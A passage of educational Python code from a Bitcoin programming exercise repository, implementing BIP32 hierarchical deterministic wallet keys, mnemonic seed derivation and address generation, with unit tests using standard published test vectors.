OP_DUP: op_dup,
OP_EQUAL: op_equal,
OP_EQUALVERIFY: op_equalverify,
OP_FROMALTSTACK: op_fromaltstack,
OP_HASH160: op_hash160,
OP_IF: op_if,
OP_NOTIF: op_notif,
OP_TOALTSTACK: op_toaltstack,
OP_VERIFY: op_verify,
}
OP_CODE_NAMES = {
OP_0: 'OP_0',
OP_PUSHDATA1: 'OP_PUSHDATA1',
OP_PUSHDATA2: 'OP_PUSHDATA2',
OP_1NEGATE: 'OP_1NEGATE',
OP_1: 'OP_1',
OP_2: 'OP_2',
OP_3: 'OP_3',
OP_4: 'OP_4',
OP_5: 'OP_5',
OP_6: 'OP_6',
OP_7: 'OP_7',
OP_8: 'OP_8',
OP_9: 'OP_9',
OP_10: 'OP_10',
OP_11: 'OP_11',
OP_12: 'OP_12',
OP_13: 'OP_13',
OP_14: 'OP_14',
OP_15: 'OP_15',
OP_16: 'OP_16',
OP_NOP: 'OP_NOP',
OP_IF: 'OP_IF',
OP_NOTIF: 'OP_NOTIF',
OP_ELSE: 'OP_ELSE',
OP_ENDIF: 'OP_ENDIF',
OP_VERIFY: 'OP_VERIFY',
OP_RETURN: 'OP_RETURN',
OP_TOALTSTACK: 'OP_TOALTSTACK',
OP_FROMALTSTACK: 'OP_FROMALTSTACK',
OP_2DROP: 'OP_2DROP',
OP_2DUP: 'OP_2DUP',
OP_3DUP: 'OP_3DUP',
OP_2OVER: 'OP_2OVER',
OP_2ROT: 'OP_2ROT',
OP_2SWAP: 'OP_2SWAP',
OP_IFDUP: 'OP_IFDUP',
OP_DEPTH: 'OP_DEPTH',
OP_DROP: 'OP_DROP',
OP_DUP: 'OP_DUP',
OP_NIP: 'OP_NIP',
OP_OVER: 'OP_OVER',
OP_PICK: 'OP_PICK',
OP_ROLL: 'OP_ROLL',
OP_ROT: 'OP_ROT',
OP_SWAP: 'OP_SWAP',
OP_TUCK: 'OP_TUCK',
OP_SIZE: 'OP_SIZE',
OP_EQUAL: 'OP_EQUAL',
OP_EQUALVERIFY: 'OP_EQUALVERIFY',
OP_1ADD: 'OP_1ADD',
OP_1SUB: 'OP_1SUB',
OP_NEGATE: 'OP_NEGATE',
OP_ABS: 'OP_ABS',
OP_NOT: 'OP_NOT',
OP_0NOTEQUAL: 'OP_0NOTEQUAL',
OP_ADD: 'OP_ADD',
OP_SUB: 'OP_SUB',
OP_BOOLAND: 'OP_BOOLAND',
OP_BOOLOR: 'OP_BOOLOR',
OP_NUMEQUAL: 'OP_NUMEQUAL',
OP_NUMEQUALVERIFY: 'OP_NUMEQUALVERIFY',
OP_NUMNOTEQUAL: 'OP_NUMNOTEQUAL',
OP_LESSTHAN: 'OP_LESSTHAN',
OP_GREATERTHAN: 'OP_GREATERTHAN',
OP_LESSTHANOREQUAL: 'OP_LESSTHANOREQUAL',
OP_GREATERTHANOREQUAL: 'OP_GREATERTHANOREQUAL',
OP_MIN: 'OP_MIN',
OP_MAX: 'OP_MAX',
OP_WITHIN: 'OP_WITHIN',
OP_RIPEMD160: 'OP_RIPEMD160',
OP_SHA1: 'OP_SHA1',
OP_SHA256: 'OP_SHA256',
OP_HASH160: 'OP_HASH160',
OP_HASH256: 'OP_HASH256',
OP_CHECKSIG: 'OP_CHECKSIG',
OP_CHECKSIGVERIFY: 'OP_CHECKSIGVERIFY',
OP_CHECKMULTISIG: 'OP_CHECKMULTISIG',
OP_CHECKMULTISIGVERIFY: 'OP_CHECKMULTISIGVERIFY',
OP_CHECKLOCKTIMEVERIFY: 'OP_CHECKLOCKTIMEVERIFY',
OP_CHECKSEQUENCEVERIFY: 'OP_CHECKSEQUENCEVERIFY',
}
``` |
{
"source": "jimmysong/pw-exercises",
"score": 2
} |
#### File: pw-exercises/session6/hd.py
```python
from io import BytesIO
from unittest import TestCase
from ecc import G, N, PrivateKey, S256Point
from helper import (
big_endian_to_int,
byte_to_int,
encode_base58_checksum,
hmac_sha512,
hmac_sha512_kdf,
int_to_big_endian,
int_to_byte,
raw_decode_base58,
sha256,
)
from mnemonic import secure_mnemonic, WORD_LOOKUP, WORD_LIST
MAINNET_XPRV = bytes.fromhex('0488ade4')
MAINNET_XPUB = bytes.fromhex('0488b21e')
MAINNET_YPRV = bytes.fromhex('049d7878')
MAINNET_YPUB = bytes.fromhex('049d7cb2')
MAINNET_ZPRV = bytes.fromhex('04b2430c')
MAINNET_ZPUB = bytes.fromhex('04b24746')
TESTNET_XPRV = bytes.fromhex('04358394')
TESTNET_XPUB = bytes.fromhex('043587cf')
TESTNET_YPRV = bytes.fromhex('044a4e28')
TESTNET_YPUB = bytes.fromhex('044a5262')
TESTNET_ZPRV = bytes.fromhex('045f18bc')
TESTNET_ZPUB = bytes.fromhex('045f1cf6')
class HDPrivateKey:
def __init__(self, private_key, chain_code,
depth=0, parent_fingerprint=b'\x00\x00\x00\x00',
child_number=0, testnet=False):
# the main secret, should be a PrivateKey object
self.private_key = private_key
self.private_key.testnet = testnet
# the code to make derivation deterministic
self.chain_code = chain_code
# level the current key is at in the heirarchy
self.depth = depth
# fingerprint of the parent key
self.parent_fingerprint = parent_fingerprint
# what order child this is
self.child_number = child_number
self.testnet = testnet
# keep a copy of the corresponding public key
self.pub = HDPublicKey(
point=private_key.point,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=testnet,
)
def wif(self):
return self.private_key.wif()
def sec(self):
return self.pub.sec()
def hash160(self):
return self.pub.hash160()
def p2pkh_script(self):
return self.pub.p2pkh_script()
def p2wpkh_script(self):
return self.pub.p2wpkh_script()
def p2sh_p2wpkh_script(self):
return self.pub.p2sh_p2wpkh_script()
def address(self):
return self.pub.address()
def bech32_address(self):
return self.pub.bech32_address()
def p2sh_p2wpkh_address(self):
return self.pub.p2sh_p2wpkh_address()
def __repr__(self):
return self.xprv()
@classmethod
def from_seed(cls, seed, testnet=False):
# get hmac_sha512 with b'Bitcoin seed' and seed
h = hmac_sha512(b'Bitcoin seed', seed)
# create the private key using the first 32 bytes in big endian
private_key = PrivateKey(secret=big_endian_to_int(h[:32]))
# chaincode is the last 32 bytes
chain_code = h[32:]
# return an instance of the class
return cls(
private_key=private_key,
chain_code=chain_code,
testnet=testnet,
)
def child(self, index):
'''Returns the child HDPrivateKey at a particular index.
Hardened children return for indices >= 0x8000000.
'''
# if index >= 0x80000000
if index >= 0x80000000:
# the message data is the private key secret in 33 bytes in
# big-endian and the index in 4 bytes big-endian.
data = int_to_big_endian(self.private_key.secret, 33) + int_to_big_endian(index, 4)
else:
# the message data is the public key compressed SEC
# and the index in 4 bytes big-endian.
data = self.private_key.point.sec() + int_to_big_endian(index, 4)
# get the hmac_sha512 with chain code and data
h = hmac_sha512(self.chain_code, data)
# the new secret is the first 32 bytes as a big-endian integer
# plus the secret mod N
secret = (big_endian_to_int(h[:32]) + self.private_key.secret) % N
# create the PrivateKey object
private_key = PrivateKey(secret=secret)
# the chain code is the last 32 bytes
chain_code = h[32:]
# depth is whatever the current depth + 1
depth = self.depth + 1
# parent_fingerprint is the fingerprint of this node
parent_fingerprint = self.fingerprint()
# child number is the index
child_number = index
# return a new HDPrivateKey instance
return HDPrivateKey(
private_key=private_key,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=self.testnet,
)
def traverse(self, path):
'''Returns the HDPrivateKey at the path indicated.
Path should be in the form of m/x/y/z where x' means
hardened'''
# keep track of the current node starting with self
current = self
# split up the path by the '/' splitter, ignore the first
components = path.split('/')[1:]
# iterate through the path components
for child in components:
# if the child ends with a ', we have a hardened child
if child.endswith("'"):
# index is the integer representation + 0x80000000
index = int(child[:-1]) + 0x80000000
# else the index is the integer representation
else:
index = int(child)
# grab the child at the index calculated
current = current.child(index)
# return the current child
return current
def raw_serialize(self, version):
# version + depth + parent_fingerprint + child number + chain code + private key
# start with version, which should be a constant depending on testnet
raw = version
# add depth, which is 1 byte using int_to_byte
raw += int_to_byte(self.depth)
# add the parent_fingerprint
raw += self.parent_fingerprint
# add the child number 4 bytes using int_to_big_endian
raw += int_to_big_endian(self.child_number, 4)
# add the chain code
raw += self.chain_code
# add the 0 byte and the private key's secret in big endian, 33 bytes
raw += int_to_big_endian(self.private_key.secret, 33)
return raw
def _prv(self, version):
'''Returns the base58-encoded x/y/z prv.
Expects a 4-byte version.'''
raw = self.raw_serialize(version)
# return the whole thing base58-encoded
return encode_base58_checksum(raw)
def xprv(self):
# from BIP0032:
if self.testnet:
version = TESTNET_XPRV
else:
version = MAINNET_XPRV
return self._prv(version)
def yprv(self):
# from BIP0049:
if self.testnet:
version = TESTNET_YPRV
else:
version = MAINNET_YPRV
return self._prv(version)
def zprv(self):
# from BIP0084:
if self.testnet:
version = TESTNET_ZPRV
else:
version = MAINNET_ZPRV
return self._prv(version)
# passthrough methods
def fingerprint(self):
return self.pub.fingerprint()
def xpub(self):
return self.pub.xpub()
def ypub(self):
return self.pub.ypub()
def zpub(self):
return self.pub.zpub()
@classmethod
def parse(cls, s):
'''Returns a HDPrivateKey from an extended key string'''
# get the bytes from the base58 using raw_decode_base58
raw = raw_decode_base58(s)
# check that the length of the raw is 78 bytes, otherwise raise ValueError
if len(raw) != 78:
raise ValueError('Not a proper extended key')
# create a stream
stream = BytesIO(raw)
# return the raw parsing of the stream
return cls.raw_parse(stream)
@classmethod
def raw_parse(cls, s):
'''Returns a HDPrivateKey from a stream'''
# first 4 bytes are the version
version = s.read(4)
# check that the version is one of the TESTNET or MAINNET
# private keys, if not raise a ValueError
if version in (TESTNET_XPRV, TESTNET_YPRV, TESTNET_ZPRV):
testnet = True
elif version in (MAINNET_XPRV, MAINNET_YPRV, MAINNET_ZPRV):
testnet = False
else:
raise ValueError('not an xprv, yprv or zprv: {}'.format(version))
# the next byte is depth
depth = byte_to_int(s.read(1))
# next 4 bytes are the parent_fingerprint
parent_fingerprint = s.read(4)
# next 4 bytes is the child number in big-endian
child_number = big_endian_to_int(s.read(4))
# next 32 bytes are the chain code
chain_code = s.read(32)
# the next byte should be b'\x00'
if byte_to_int(s.read(1)) != 0:
raise ValueError('private key should be preceded by a zero byte')
# last 32 bytes should be the private key in big endian
private_key = PrivateKey(secret=big_endian_to_int(s.read(32)))
# return an instance of the class
return cls(
private_key=private_key,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=testnet,
)
def _get_address(self, purpose, account=0, external=True, address=0):
'''Returns the proper address among purposes 44', 49' and 84'.
p2pkh for 44', p2sh-p2wpkh for 49' and p2wpkh for 84'.'''
# if purpose is not one of 44', 49' or 84', raise ValueError
if purpose not in ("44'", "49'", "84'"):
raise ValueError('Cannot create an address without a proper purpose: {}'.format(purpose))
# if testnet, coin is 1', otherwise 0'
if self.testnet:
coin = "1'"
else:
coin = "0'"
# if external, chain is 0, otherwise 1
if external:
chain = '0'
else:
chain = '1'
# create the path m/purpose'/coin'/account'/chain/address
path = "m/{}/{}/{}'/{}/{}".format(purpose, coin, account, chain, address)
# get the HDPrivateKey at that location
hd_priv = self.traverse(path)
# if 44', return the address
if purpose == "44'":
return hd_priv.address()
# if 49', return the p2sh_p2wpkh_address
elif purpose == "49'":
return hd_priv.p2sh_p2wpkh_address()
# if 84', return the bech32_address
elif purpose == "84'":
return hd_priv.bech32_address()
def get_p2pkh_receiving_address(self, account=0, address=0):
return self._get_address("44'", account, True, address)
def get_p2pkh_change_address(self, account=0, address=0):
return self._get_address("44'", account, False, address)
def get_p2sh_p2wpkh_receiving_address(self, account=0, address=0):
return self._get_address("49'", account, True, address)
def get_p2sh_p2wpkh_change_address(self, account=0, address=0):
return self._get_address("49'", account, False, address)
def get_p2wpkh_receiving_address(self, account=0, address=0):
return self._get_address("84'", account, True, address)
def get_p2wpkh_change_address(self, account=0, address=0):
return self._get_address("84'", account, False, address)
@classmethod
def generate(cls, password=b'', entropy=0, testnet=False):
mnemonic = secure_mnemonic(entropy=entropy)
return mnemonic, cls.from_mnemonic(mnemonic, password=password, testnet=testnet)
@classmethod
def from_mnemonic(cls, mnemonic, password=b'', path='m', testnet=False):
'''Returns a HDPrivateKey object from the mnemonic.'''
# split the mnemonic into words with .split()
words = mnemonic.split()
# check that there are 12, 15, 18, 21 or 24 words
# if not, raise a ValueError
if len(words) not in (12, 15, 18, 21, 24):
raise ValueError('you need 12, 15, 18, 21, or 24 words')
# calculate the number
number = 0
# each word is 11 bits
for word in words:
# get the number that the word represents using WORD_LOOKUP
index = WORD_LOOKUP[word]
# left-shift the number by 11 bits and bitwise-or the index
number = (number << 11) | index
# checksum is the last n bits where n = (# of words / 3)
checksum_bits_length = len(words) // 3
# grab the checksum bits
checksum = number & ((1 << checksum_bits_length) - 1)
# get the actual number by right-shifting by the checksum bits length
data_num = number >> checksum_bits_length
# convert the number to big-endian
data = int_to_big_endian(data_num, checksum_bits_length * 4)
# the one byte we get is from sha256 of the data, shifted by
# 8 - the number of bits we need for the checksum
computed_checksum = sha256(data)[0] >> (8 - checksum_bits_length)
# check that the checksum is correct or raise ValueError
if checksum != computed_checksum:
raise ValueError('words fail checksum: {}'.format(words))
# normalize in case we got a mnemonic that's just the first 4 letters
normalized_words = []
for word in words:
normalized_words.append(WORD_LIST[WORD_LOOKUP[word]])
normalized_mnemonic = ' '.join(normalized_words)
# salt is b'mnemonic' + password
salt = b'mnemonic' + password
# the seed is the hmac_sha512_kdf with normalized mnemonic and salt
seed = hmac_sha512_kdf(normalized_mnemonic, salt)
# return the HDPrivateKey at the path specified
return cls.from_seed(seed, testnet=testnet).traverse(path)
class HDPublicKey:
def __init__(self, point, chain_code, depth, parent_fingerprint,
child_number, testnet=False):
self.point = point
self.chain_code = chain_code
self.depth = depth
self.parent_fingerprint = parent_fingerprint
self.child_number = child_number
self.testnet = testnet
self._raw = None
def __repr__(self):
return self.xpub()
def sec(self):
return self.point.sec()
def hash160(self):
return self.point.hash160()
def p2pkh_script(self):
return self.point.p2pkh_script()
def p2wpkh_script(self):
return self.point.p2wpkh_script()
def p2sh_p2wpkh_script(self):
return self.point.p2sh_p2wpkh_script()
def address(self):
return self.point.address(testnet=self.testnet)
def bech32_address(self):
return self.point.bech32_address(testnet=self.testnet)
def p2sh_p2wpkh_address(self):
return self.point.p2sh_p2wpkh_address(testnet=self.testnet)
def fingerprint(self):
'''Fingerprint is the hash160's first 4 bytes'''
return self.hash160()[:4]
def child(self, index):
'''Returns the child HDPrivateKey at a particular index.
Raises ValueError for indices >= 0x8000000.
'''
# if index >= 0x80000000, raise a ValueError
if index >= 0x80000000:
raise ValueError('child number should always be less than 2^31')
# data is the SEC compressed and the index in 4 bytes big-endian
data = self.point.sec() + int_to_big_endian(index, 4)
# get hmac_sha512 with chain code, data
h = hmac_sha512(self.chain_code, data)
# the new public point is the current point +
# the first 32 bytes in big endian * G
point = self.point + big_endian_to_int(h[:32]) * G
# chain code is the last 32 bytes
chain_code = h[32:]
# depth is current depth + 1
depth = self.depth + 1
# parent_fingerprint is the fingerprint of this node
parent_fingerprint = self.fingerprint()
# child number is the index
child_number = index
# return the HDPublicKey instance
return HDPublicKey(
point=point,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=self.testnet,
)
def traverse(self, path):
'''Returns the HDPublicKey at the path indicated.
Path should be in the form of m/x/y/z.'''
# start current node at self
current = self
# get components of the path split at '/', ignoring the first
components = path.split('/')[1:]
# iterate through the components
for child in components:
# raise a ValueError if the path ends with a '
if child[-1:] == "'":
raise ValueError('HDPublicKey cannot get hardened child')
# traverse the next child at the index
current = current.child(int(child))
# return the current node
return current
def raw_serialize(self):
if self._raw is None:
if self.testnet:
version = TESTNET_XPUB
else:
version = MAINNET_XPUB
self._raw = self._serialize(version)
return self._raw
def _serialize(self, version):
# start with the version
raw = version
# add the depth using int_to_byte
raw += int_to_byte(self.depth)
# add the parent_fingerprint
raw += self.parent_fingerprint
# add the child number in 4 bytes using int_to_big_endian
raw += int_to_big_endian(self.child_number, 4)
# add the chain code
raw += self.chain_code
# add the SEC pubkey
raw += self.point.sec()
return raw
def _pub(self, version):
'''Returns the base58-encoded x/y/z pub.
Expects a 4-byte version.'''
# get the serialization
raw = self._serialize(version)
# base58-encode the whole thing
return encode_base58_checksum(raw)
def xpub(self):
if self.testnet:
version = TESTNET_XPUB
else:
version = MAINNET_XPUB
return self._pub(version)
def ypub(self):
if self.testnet:
version = TESTNET_YPUB
else:
version = MAINNET_YPUB
return self._pub(version)
def zpub(self):
if self.testnet:
version = TESTNET_ZPUB
else:
version = MAINNET_ZPUB
return self._pub(version)
@classmethod
def parse(cls, s):
'''Returns a HDPublicKey from an extended key string'''
# get the bytes from the base58 using raw_decode_base58
raw = raw_decode_base58(s)
# check that the length of the raw is 78 bytes, otherwise raise ValueError
if len(raw) != 78:
raise ValueError('Not a proper extended key')
# create a stream
stream = BytesIO(raw)
# return the raw parsing of the stream
return cls.raw_parse(stream)
@classmethod
def raw_parse(cls, s):
'''Returns a HDPublicKey from a stream'''
# first 4 bytes are the version
version = s.read(4)
# check that the version is one of the TESTNET or MAINNET
# public keys, if not raise a ValueError
if version in (TESTNET_XPUB, TESTNET_YPUB, TESTNET_ZPUB):
testnet = True
elif version in (MAINNET_XPUB, MAINNET_YPUB, MAINNET_ZPUB):
testnet = False
else:
raise ValueError('not an xpub, ypub or zpub: {} {}'.format(s, version))
# the next byte is depth
depth = byte_to_int(s.read(1))
# next 4 bytes are the parent_fingerprint
parent_fingerprint = s.read(4)
# next 4 bytes is the child number in big-endian
child_number = big_endian_to_int(s.read(4))
# next 32 bytes are the chain code
chain_code = s.read(32)
# last 33 bytes should be the SEC
point = S256Point.parse(s.read(33))
# return an instance of the class
return cls(
point=point,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=testnet,
)
class HDTest(TestCase):
def test_from_seed(self):
seed = b'<EMAIL> <NAME>'
priv = HDPrivateKey.from_seed(seed, testnet=True)
addr = priv.bech32_address()
self.assertEqual(addr, 'tb1q7kn55vf3mmd40gyj46r245lw87dc6us5n50lrg')
def test_child(self):
seed = b'<EMAIL> <NAME>'
priv = HDPrivateKey.from_seed(seed, testnet=True)
pub = priv.pub
want = 'tb1qu6mnnk54hxfhy4aj58v0w6e7q8hghtv8wcdl7g'
addr = priv.child(0).bech32_address()
self.assertEqual(addr, want)
addr = pub.child(0).bech32_address()
self.assertEqual(addr, want)
addr = priv.child(0x80000002).bech32_address()
self.assertEqual(addr, 'tb1qscu8evdlqsucj7p84xwnrf63h4jsdr5yqga8zq')
with self.assertRaises(ValueError):
pub.child(0x80000002)
def test_traverse(self):
seed = b'<EMAIL> <NAME>'
priv = HDPrivateKey.from_seed(seed, testnet=True)
pub = priv.pub
path = "m/1/2/3/4"
self.assertEqual(priv.traverse(path).bech32_address(), pub.traverse(path).bech32_address())
path = "m/0/1'/2/3'"
self.assertEqual(priv.traverse(path).bech32_address(), 'tb1q423gz8cenqt6vfw987vlyxql0rh2jgh4sy0tue')
def test_prv_pub(self):
tests = [
{
'seed': bytes.fromhex('000102030405060708090a0b0c0d0e0f'),
'paths': [
[
'm',
'<KEY>',
'<KEY>',
], [
'm/0\'',
'<KEY>',
'<KEY>',
], [
'm/0\'/1',
'<KEY>',
'<KEY>',
], [
'm/0\'/1/2\'',
'<KEY>',
'<KEY>',
], [
'm/0\'/1/2\'/2',
'<KEY>',
'<KEY>',
], [
'm/0\'/1/2\'/2/1000000000',
'<KEY>',
'<KEY>',
]
],
}, {
'seed': bytes.fromhex('fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542'),
'paths': [
[
'm',
'<KEY>',
'<KEY>',
], [
'm/0',
'<KEY>',
'<KEY>',
], [
'm/0/2147483647\'',
'<KEY>',
'<KEY>',
], [
'm/0/2147483647\'/1',
'<KEY>',
'<KEY>',
], [
'm/0/2147483647\'/1/2147483646\'',
'<KEY>',
'<KEY>',
], [
'm/0/2147483647\'/1/2147483646\'/2',
'<KEY>',
'<KEY>',
],
],
}, {
'seed': bytes.fromhex('4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be'),
'paths': [
[
'm',
'<KEY>',
'<KEY>',
], [
'm/0\'',
'<KEY>',
'<KEY>',
],
],
},
]
for test in tests:
seed = test['seed']
for path, xpub, xprv in test['paths']:
# test from seed
private_key = HDPrivateKey.from_seed(seed).traverse(path)
public_key = HDPublicKey.parse(xpub)
self.assertEqual(private_key.xprv(), xprv)
self.assertEqual(private_key.xpub(), public_key.xpub())
self.assertEqual(private_key.address(), public_key.address())
def test_parse(self):
xpub = '<KEY>'
hd_pub = HDPublicKey.parse(xpub)
self.assertEqual(hd_pub.xpub(), xpub)
xprv = '<KEY>'
hd_priv = HDPrivateKey.parse(xprv)
self.assertEqual(hd_priv.xprv(), xprv)
def test_get_address(self):
seedphrase = b'<EMAIL> <NAME>'
mainnet_priv = HDPrivateKey.from_seed(seedphrase)
testnet_priv = HDPrivateKey.from_seed(seedphrase, testnet=True)
tests = [
[mainnet_priv.get_p2pkh_receiving_address, 0, 1, '13pS51XfGTVhxbtrGKVSvwf36r96tLUu1K'],
[testnet_priv.get_p2pkh_change_address, 1, 0, 'n4EiCRsEEPaJ73HWA6zYEaHwo45BrP5MHb'],
[testnet_priv.get_p2sh_p2wpkh_receiving_address, 0, 2, '2NGKoo11UopXBWLC7qqj9BjgH9F3gvLdapz'],
[mainnet_priv.get_p2sh_p2wpkh_change_address, 0, 0, '38hYFPLMTykhURpCQTxkdDcpQKyieiYiU7'],
[mainnet_priv.get_p2wpkh_receiving_address, 2, 0, '<KEY>'],
[testnet_priv.get_p2wpkh_change_address, 1, 1, 'tb1qecjwdw5uwwdfezzntec7m4kc8zkyjcamlz7dv9'],
]
for function, account, address, want in tests:
got = function(account, address)
self.assertEqual(got, want)
def test_from_mnemonic(self):
tests = [
[
"00000000000000000000000000000000",
"abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about",
"c55257c360c07c72029aebc1b53c05ed0362ada38ead3e3e9efa3708e53495531f09a6987599d18264c1e1c92f2cf141630c7a3c4ab7c81b2f001698e7463b04",
"<KEY>"
], [
"7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f",
"legal winner thank year wave sausage worth useful legal winner thank yellow",
"<KEY>",
"<KEY>"
], [
"80808080808080808080808080808080",
"letter advice cage absurd amount doctor acoustic avoid letter advice cage above",
"d71de856f81a8acc65e6fc851a38d4d7ec216fd0796d0a6827a3ad6ed5511a30fa280f12eb2e47ed2ac03b5c462a0358d18d69fe4f985ec81778c1b370b652a8",
"<KEY>"
], [
"ffffffffffffffffffffffffffffffff",
"zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo wrong",
"ac27495480225222079d7be181583751e86f571027b0497b5b5d11218e0a8a13332572917f0f8e5a589620c6f15b11c61dee327651a14c34e18231052e48c069",
"<KEY>"
], [
"000000000000000000000000000000000000000000000000",
"abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon agent",
"035895f2f481b1b0f01fcf8c289c794660b289981a78f8106447707fdd9666ca06da5a9a565181599b79f53b844d8a71dd9f439c52a3d7b3e8a79c906ac845fa",
"<KEY>"
], [
"7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f",
"legal winner thank year wave sausage worth useful legal winner thank year wave sausage worth useful legal will",
"f2b94508732bcbacbcc020faefecfc89feafa6649a5491b8c952cede496c214a0c7b3c392d168748f2d4a612bada0753b52a1c7ac53c1e93abd5c6320b9e95dd",
"<KEY>"
], [
"808080808080808080808080808080808080808080808080",
"letter advice cage absurd amount doctor acoustic avoid letter advice cage absurd amount doctor acoustic avoid letter always",
"<KEY>",
"<KEY>"
], [
"ffffffffffffffffffffffffffffffffffffffffffffffff",
"zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo when",
"<KEY>",
"<KEY>"
], [
"0000000000000000000000000000000000000000000000000000000000000000",
"abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon art",
"bda85446c68413707090a52022edd26a1c9462295029f2e60cd7c4f2bbd3097170af7a4d73245cafa9c3cca8d561a7c3de6f5d4a10be8ed2a5e608d68f92fcc8",
"<KEY>"
], [
"7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f",
"legal winner thank year wave sausage worth useful legal winner thank year wave sausage worth useful legal winner thank year wave sausage worth title",
"<KEY>",
"<KEY>"
], [
"8080808080808080808080808080808080808080808080808080808080808080",
"letter advice cage absurd amount doctor acoustic avoid letter advice cage absurd amount doctor acoustic avoid letter advice cage absurd amount doctor acoustic bless",
"c0c519bd0e91a2ed54357d9d1ebef6f5af218a153624cf4f2da911a0ed8f7a09e2ef61af0aca007096df430022f7a2b6fb91661a9589097069720d015e4e982f",
"<KEY>"
], [
"ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
"zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo vote",
"<KEY>",
"<KEY>"
], [
"9e885d952ad362caeb4efe34a8e91bd2",
"ozone drill grab fiber curtain grace pudding thank cruise elder eight picnic",
"<KEY>",
"<KEY>"
], [
"<KEY>",
"gravity machine north sort system female filter attitude volume fold club stay feature office ecology stable narrow fog",
"<KEY>",
"<KEY>"
], [
"68a79eaca2324873eacc50cb9c6eca8cc68ea5d936f98787c60c7ebc74e6ce7c",
"hamster diagram private dutch cause delay private meat slide toddler razor book happy fancy gospel tennis maple dilemma loan word shrug inflict delay length",
"<KEY>",
"<KEY>"
], [
"<KEY>",
"scheme spot photo card baby mountain device kick cradle pact join borrow",
"ea725895aaae8d4c1cf682c1bfd2d358d52ed9f0f0591131b559e2724bb234fca05aa9c02c57407e04ee9dc3b454aa63fbff483a8b11de949624b9f1831a9612",
"<KEY>"
], [
"<KEY>",
"horn tenant knee talent sponsor spell gate clip pulse soap slush warm silver nephew swap uncle crack brave",
"<KEY>",
"<KEY>"
], [
"<KEY>",
"panda eyebrow bullet gorilla call smoke muffin taste mesh discover soft ostrich alcohol speed nation flash devote level hobby quick inner drive ghost inside",
"<KEY>",
"<KEY>"
], [
"23db8160a31d3e0dca3688ed941adbf3",
"cat swing flag economy stadium alone churn speed unique patch report train",
"deb5f45449e615feff5640f2e49f933ff51895de3b4381832b3139941c57b59205a42480c52175b6efcffaa58a2503887c1e8b363a707256bdd2b587b46541f5",
"<KEY>"
], [
"8197a4a47f0425faeaa69deebc05ca29c0a5b5cc76ceacc0",
"light rule cinnamon wrap drastic word pride squirrel upgrade then income fatal apart sustain crack supply proud access",
"4cbdff1ca2db800fd61cae72a57475fdc6bab03e441fd63f96dabd1f183ef5b782925f00105f318309a7e9c3ea6967c7801e46c8a58082674c860a37b93eda02",
"<KEY>"
], [
"066dca1a2bb7e8a1db2832148ce9933eea0f3ac9548d793112d9a95c9407efad",
"all hour make first leader extend hole alien behind guard gospel lava path output census museum junior mass reopen famous sing advance salt reform",
"<KEY>",
"<KEY>"
], [
"f30f8c1da665478f49b001d94c5fc452",
"vessel ladder alter error federal sibling chat ability sun glass valve picture",
"<KEY>",
"<KEY>"
], [
"<KEY>",
"scissors invite lock maple supreme raw rapid void congress muscle digital elegant little brisk hair mango congress clump",
"7b4a10be9d98e6cba265566db7f136718e1398c71cb581e1b2f464cac1ceedf4f3e274dc270003c670ad8d02c4558b2f8e39edea2775c9e232c7cb798b069e88",
"<KEY>"
], [
"<KEY>",
"void come effort suffer camp survey warrior heavy shoot primary clutch crush open amazing screen patrol group space point ten exist slush involve unfold",
"01f5bced59dec48e362f2c45b5de68b9fd6c92c6634f44d6d40aab69056506f0e35524a518034ddc1192e1dacd32c1ed3eaa3c3b131c88ed8e7e54c49a5d0998",
"<KEY>"
]
]
for entropy, mnemonic, seed, xprv in tests:
private_key = HDPrivateKey.from_mnemonic(mnemonic, b'TREZOR')
self.assertEqual(private_key.xprv(), xprv)
def test_bip49(self):
mnemonic = 'abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about'
password = b''
path = 'm'
hd_private_key = HDPrivateKey.from_mnemonic(mnemonic, password, path=path, testnet=True)
want = '<KEY>'
self.assertEqual(hd_private_key.xprv(), want)
account0 = hd_private_key.child((1 << 31) + 49).child((1 << 31) + 1).child(1 << 31)
want = '<KEY>'
self.assertEqual(account0.xprv(), want)
account0_pub = account0.pub
account0_first_key = account0.child(0).child(0)
pub_first_key = account0_pub.traverse('/0/0')
want = '<KEY>'
self.assertEqual(account0_first_key.wif(), want)
want = 0xc9bdb49cfbaedca21c4b1f3a7803c34636b1d7dc55a717132443fc3f4c5867e8
self.assertEqual(account0_first_key.private_key.secret, want)
want = bytes.fromhex('03a1af804ac108a8a51782198c2d034b28bf90c8803f5a53f76276fa69a4eae77f')
self.assertEqual(account0_first_key.private_key.point.sec(), want)
self.assertEqual(pub_first_key.address(), account0_first_key.address())
def test_bech32_address(self):
mnemonic = 'abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about'
password = b''
path = 'm/84\'/0\'/0\''
account = HDPrivateKey.from_mnemonic(mnemonic, password, path=path, testnet=False)
want = '<KEY>'
self.assertEqual(account.zprv(), want)
want = '<KEY>'
self.assertEqual(account.zpub(), want)
first_key = account.child(0).child(0)
